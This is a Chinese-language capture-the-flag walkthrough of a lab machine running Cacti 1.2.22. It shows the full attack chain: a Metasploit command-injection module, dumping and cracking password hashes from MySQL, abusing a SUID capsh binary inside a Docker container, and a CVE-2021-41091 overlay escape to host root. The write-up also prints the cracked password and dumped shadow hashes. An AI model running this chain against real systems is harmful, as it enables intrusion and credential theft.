基本信息

端口扫描

22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ nmap -sC -sV -Pn 10.10.11.211
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-30 13:29 CST
Nmap scan report for 10.10.11.211
Host is up (0.11s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
|   256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_  256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Login to Cacti
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.55 seconds

80

cacti 1.2.22:

cacti

搜到这个:

也可以直接用msf:

1
msf6 > use exploit/linux/http/cacti_unauthenticated_cmd_injection

打到容器的www-data:

/entrypoint.sh

根目录发现entrypoint.sh,查看内容得到mysql:

mysql

mysql中获取到两个hash,破解出来marcus的密码:

1
2
3
4
5
6
7
8
9
mysql --host=db --user=root --password=root cacti -e "show tables"
mysql --host=db --user=root --password=root cacti -e "select * from user_auth"

admin:$2y$10$IhEA.Og8vrvwueM7VEDkUes3pwc3zaBbQ/iuqMft/llx8utpR1hjC
marcus:$2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C

sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

marcus : funkymonkey

user flag

marcus ssh登录,得到user flag:

另外登录时提示有邮件,查看邮件里面提到三个漏洞:

1
2
3
4
5
6
7
cat /var/mail/marcus

CVE-2021-33033: This vulnerability affects the Linux kernel before 5.11.14 and is related to the CIPSO and CALIPSO refcounting for the DOI definitions. Attackers can exploit this use-after-free issue to write arbitrary values. Please update your kernel to version 5.11.14 or later to address this vulnerability.

CVE-2020-25706: This cross-site scripting (XSS) vulnerability affects Cacti 1.2.13 and occurs due to improper escaping of error messages during template import previews in the xml_path field. This could allow an attacker to inject malicious code into the webpage, potentially resulting in the theft of sensitive data or session hijacking. Please upgrade to Cacti version 1.2.14 or later to address this vulnerability.

CVE-2021-41091: This vulnerability affects Moby, an open-source project created by Docker for software containerization. Attackers could exploit this vulnerability by traversing directory contents and executing programs on the data directory with insufficiently restricted permissions. The bug has been fixed in Moby (Docker Engine) version 20.10.9, and users should update to this version as soon as possible. Please note that running containers should be stopped and restarted for the permissions to be fixed.

提权信息

根据邮件中信息,提权应该是通过CVE-2021-41091:

根据描述就是外部宿主机调用docker内suid程序

Docker

回到容器的www-data,检查suid发现/sbin/capsh:

docker root

利用capsh的suid得到容器的root:

然后给容器内的bash添加suid

1
2
/sbin/capsh --gid=0 --uid=0 --
chmod +s /bin/bash

提权 & root flag

再回到marcus ,查看挂载得到对应目录,然后直接运行docker内的suid bash得到root:

1
2
3
4
5
marcus@monitorstwo:~$ findmnt

/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/

/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/diff/bin/bash -p

shadow

1
2
root:$6$KQUOT7rGEpEUTjFc$hA2mxdKhpH7RQ3g5ZGjzkPrRpq1jCqmiZY9SgqaoTb1BI6APMo14Ed/Ptbfnf5MAkCbBbHEbRqwzPc301fuat1:19366:0:99999:7:::
marcus:$6$mobk0CS45kj4tF6o$bOq9Svoa9Q9AbmfIz2K210JOwv1wS3AFhaCsYkewZleSwBysUj/a57p0YhRvi40A6cfkDFHfnuOP3useo.ms/1:19366:0:99999:7:::

参考资料